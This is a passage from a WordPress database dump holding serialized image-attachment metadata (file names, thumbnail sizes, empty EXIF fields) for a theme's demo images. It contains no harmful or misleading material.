:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h3-team-spec-member-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"h3-team-spec-member-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h3-team-spec-member-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51657,4334,'_wp_attached_file','2018/08/h5-img-2.jpg'),(51658,4334,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:433;s:6:\"height\";i:865;s:4:\"file\";s:20:\"2018/08/h5-img-2.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h5-img-2-150x300.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:20:\"h5-img-2-433x650.jpg\";s:5:\"width\";i:433;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:20:\"h5-img-2-433x650.jpg\";s:5:\"width\";i:433;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h5-img-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"h5-img-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51659,4332,'_wp_attachment_image_alt','b'),(51660,4332,'portfolio_single_masonry_image_size',''),(51661,4332,'image_gallery_masonry_image_size','large-height'),(51662,1447,'_wp_attached_file','2018/08/h1-blog-post-1.jpg'),(51663,1447,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:1580;s:4:\"file\";s:26:\"2018/08/h1-blog-post-1.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-1-247x300.jpg\";s:5:\"width\";i:247;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"h1-blog-post-1-843x1024.jpg\";s:5:\"width\";i:843;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-1-768x933.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:933;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:28:\"h1-blog-post-1-1264x1536.jpg\";s:5:\"width\";i:1264;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-1-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:27:\"h1-blog-post-1-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:27:\"h1-blog-post-1-650x1300.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:28:\"h1-blog-post-1-1300x1300.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:1300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"h1-blog-post-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-1-600x729.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:729;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-1-600x729.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:729;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51664,1525,'_wp_attachment_image_alt','c'),(51665,4335,'_wp_attached_file','2018/08/h3-img-gallery-7.jpg'),(51666,4335,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:4:\"file\";s:28:\"2018/08/h3-img-gallery-7.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"h3-img-gallery-7-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-7-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-7-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:29:\"h3-img-gallery-7-1100x650.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:29:\"h3-img-gallery-7-650x1100.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"h3-img-gallery-7-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-7-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-7-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-7-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51667,4334,'_wp_attachment_image_alt','m'),(51668,1527,'_wp_attached_file','2018/08/h3-bottom-single-img.png'),(51669,1527,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:94;s:6:\"height\";i:226;s:4:\"file\";s:32:\"2018/08/h3-bottom-single-img.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h3-bottom-single-img-94x150.png\";s:5:\"width\";i:94;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h3-bottom-single-img-94x100.png\";s:5:\"width\";i:94;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h3-bottom-single-img-94x100.png\";s:5:\"width\";i:94;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51670,1527,'_wp_attachment_image_alt','d'),(51671,4333,'_wp_attachment_image_alt','m'),(51672,4336,'_wp_attached_file','2018/08/h5-img-4.jpg'),(51673,4336,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:237;s:6:\"height\";i:358;s:4:\"file\";s:20:\"2018/08/h5-img-4.jpg\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h5-img-4-199x300.jpg\";s:5:\"width\";i:199;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51674,4336,'_wp_attachment_image_alt','m'),(51675,4337,'_wp_attached_file','2018/08/h2-port-img-3a.jpg'),(51676,4337,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:630;s:4:\"file\";s:26:\"2018/08/h2-port-img-3a.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"h2-port-img-3a-300x145.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"h2-port-img-3a-1024x496.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:496;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"h2-port-img-3a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"h2-port-img-3a-768x372.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:372;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:26:\"h2-port-img-3a-650x630.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:630;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:26:\"h2-port-img-3a-650x630.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:630;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"h2-port-img-3a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"h2-port-img-3a-600x291.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:291;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"h2-port-img-3a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"h2-port-img-3a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"h2-port-img-3a-600x291.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:291;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"h2-port-img-3a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51677,1570,'_wp_attached_file','2018/08/coming-soon-backround.jpg'),(51678,1570,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:33:\"2018/08/coming-soon-backround.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"coming-soon-backround-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"coming-soon-backround-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"coming-soon-backround-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"coming-soon-backround-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:34:\"coming-soon-backround-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:33:\"coming-soon-backround-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:34:\"coming-soon-backround-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:34:\"coming-soon-backround-650x1080.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:35:\"coming-soon-backround-1300x1080.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"coming-soon-backround-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"coming-soon-backround-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"coming-soon-backround-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"coming-soon-backround-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"coming-soon-backround-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"coming-soon-backround-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51679,4338,'_wp_attached_file','2018/08/h5-img-5.jpg'),(51680,4338,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:303;s:6:\"height\";i:618;s:4:\"file\";s:20:\"2018/08/h5-img-5.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h5-img-5-147x300.jpg\";s:5:\"width\";i:147;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h5-img-5-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"h5-img-5-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51681,4335,'_wp_attachment_image_alt','b'),(51682,4335,'portfolio_single_masonry_image_size',''),(51683,4335,'image_gallery_masonry_image_size','large-width-height'),(51684,4338,'_wp_attachment_image_alt','m'),(51685,4337,'_wp_attachment_image_alt','m'),(51686,4339,'_wp_attached_file','2018/08/h3-img-gallery-8.jpg'),(51687,4339,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:550;s:4:\"file\";s:28:\"2018/08/h3-img-gallery-8.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"h3-img-gallery-8-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-8-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51688,1447,'_wp_attachment_image_alt','c'),(51689,1751,'_wp_attachment_image_alt','m'),(51690,4339,'_wp_attachment_image_alt','b'),(51691,1570,'_wp_attachment_image_alt','c'),(51692,1828,'_wp_attached_file','2018/08/h5-img-3.jpg'),(51693,1828,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:508;s:6:\"height\";i:316;s:4:\"file\";s:20:\"2018/08/h5-img-3.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h5-img-3-300x187.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h5-img-3-300x316.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:316;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"h5-img-3-300x316.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:316;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51694,1449,'_wp_attached_file','2018/08/h1-blog-post-2.jpg'),(51695,1449,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:1230;s:4:\"file\";s:26:\"2018/08/h1-blog-post-2.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-2-300x284.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"h1-blog-post-2-1024x969.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:969;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s